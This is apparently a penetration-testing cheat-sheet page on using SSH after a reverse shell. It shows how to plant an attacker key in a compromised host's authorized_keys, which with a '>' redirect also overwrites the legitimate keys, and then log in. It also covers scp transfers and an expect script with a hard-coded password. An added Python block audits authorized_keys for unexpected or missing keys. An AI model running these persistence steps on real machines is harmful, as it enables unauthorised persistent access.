⭕SSH
SSH - SCP
Generate Key Pair
If you manage to upload a reverse shell and get access to the machine, you might be able to log in over SSH. That can give you a better, more stable shell and all the other features of SSH, such as file transfer.
In the /home/user directory you can find the hidden .ssh directory by typing ls -la. Then you need to do two things:
Create a new key pair. You do that with:
ssh-keygen -t rsa -C "[email protected]"
This will create two files, one called nameOfMyKey and another called nameOfMyKey.pub. The one ending in .pub is your public key, and the other is your private key.
Add your public key to authorized_keys.
Now copy the content of nameOfMyKey.pub. On the compromised machine, go to ~/.ssh and add the public key to the authorized_keys file, like this:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys
Log in.
ssh -i nameOfMyKey [email protected]
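The defender's view of the steps above, as an added example that is not part of the original page: it parses authorized_keys content, fingerprints each key, and reports keys outside an allowlist as well as allowlisted keys that have disappeared, which is what the > redirect above causes. The key blobs, the allowlist and all function names are constructed for illustration.

```python
import base64
import hashlib
import struct

def blob_key_type(b64_blob):
    """Key type name embedded at the start of an SSH public key blob."""
    raw = base64.b64decode(b64_blob, validate=True)
    (length,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + length].decode("ascii", "replace")

def fingerprint(b64_blob):
    """SHA256 fingerprint in the form ssh-keygen -l prints."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_line(line):
    """Return (key_type, blob, comment), or None if the line holds no key."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return None
    # Entries may begin with an options field, so find the field whose
    # successor is a blob that names it as the key type.
    for i in range(len(fields) - 1):
        try:
            if blob_key_type(fields[i + 1]) == fields[i]:
                return fields[i], fields[i + 1], " ".join(fields[i + 2:])
        except (ValueError, struct.error):
            continue
    return None

def audit(text, allowed):
    """Return (unexpected entries, allowed fingerprints absent from the file)."""
    entries = [e for e in map(parse_line, text.splitlines()) if e]
    seen = {fingerprint(blob): (ktype, comment) for ktype, blob, comment in entries}
    unexpected = [(fp, *seen[fp]) for fp in seen if fp not in allowed]
    return unexpected, set(allowed) - set(seen)

def make_blob(seed):
    """Constructed ssh-ed25519 blob for the sample data, not a real key."""
    name = b"ssh-ed25519"
    body = struct.pack(">I", len(name)) + name + struct.pack(">I", 32) + bytes([seed]) * 32
    return base64.b64encode(body).decode()

ADMIN, UNKNOWN = make_blob(1), make_blob(2)  # constructed sample keys
ALLOWED = {fingerprint(ADMIN)}               # hypothetical allowlist
SAMPLE = f"""# constructed authorized_keys content
ssh-ed25519 {ADMIN} admin@workstation
no-pty,command="/bin/true" ssh-ed25519 {UNKNOWN} nameOfMyKey
"""

if __name__ == "__main__":
    print(audit(SAMPLE, ALLOWED))
```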
SCP File Transfer
Copy a file:
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
Copy a directory:
scp -r /path/to/source/dir [email protected]:/path/to/destination
Non-interactive SCP
A one-liner doesn't work because SCP prompts the user for a password, and simply echoing the password and piping it to the command won't work. Instead, build an expect script. The commands to build the file look like this:
echo '#!/usr/bin/expect' > scp.exp
echo 'spawn scp username@ip-addr:/path-to-file out-file' >> scp.exp
echo 'set pass "password"' >> scp.exp
echo 'expect {' >> scp.exp
echo 'password: {send "$pass\r"; exp_continue}' >> scp.exp
echo '}' >> scp.exp
To run this file:
expect scp.exp